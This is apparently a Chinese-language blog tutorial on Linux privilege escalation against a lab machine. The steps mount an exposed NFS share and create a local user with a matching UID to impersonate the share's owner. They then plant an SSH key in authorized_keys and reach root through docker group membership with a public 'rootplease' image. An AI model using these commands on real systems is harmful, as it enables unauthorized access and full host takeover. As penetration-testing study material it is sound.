第三方服务提权

 nfs挂载原理

目标机器192.168.17.138 开启2049 nfs端口

查看目标开放的文件夹

showmount -e 192.168.17.138

回显:/home/peter *  说明可挂载/home/peter的所有目录

第三方服务提权_第1张图片 使用WinSCP链接靶机192.168.17.138  

第三方服务提权_第2张图片

更改名字为 authorized_keys

第三方服务提权_第3张图片

 靶机

赋值权限

第三方服务提权_第4张图片

第三方服务提权_第5张图片

攻击机

第三方服务提权_第6张图片

nfs挂载提权实例

mount 192.168.17.138:/home/peter /nsq

第三方服务提权_第7张图片

查看是否挂载成功 

第三方服务提权_第8张图片

 该处为1001:1005

第三方服务提权_第9张图片

  创建用户 

在本机创建一个peter用户并且uid为1001  gid为1005即可
创建组并指定组GID:
groupadd -g 1005 peter

创建用户并指定uid以及gid:
adduser peter -uid 1001 -gid 1005

第三方服务提权_第10张图片

 sudo提权

修改用户的sudoers权限 

vim /etc/sudoers

 

添加peter  ALL=(ALL:ALL)ALL

第三方服务提权_第11张图片

查看用户权限 

 cat /etc/passwd  

发现用户权限为1001:1005,成功 

进入peter用户 

第三方服务提权_第12张图片

 生成密钥

ssh-keygen

第三方服务提权_第13张图片

 保存公钥到创建的目录下

cat /home/peter/.ssh/id_rsa.pub > /nsq/.ssh/authorized_keys  

赋值权限

chmod 700 .ssh
chmod 600 authorized_keys

第三方服务提权_第14张图片

链接成功

第三方服务提权_第15张图片

docker用户组提权

peter用户属于docker组,docker组的成员,那么可以根据此漏洞来获取root的shell

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

第三方服务提权_第16张图片

你可能感兴趣的:(内网渗透,linux,运维,服务器)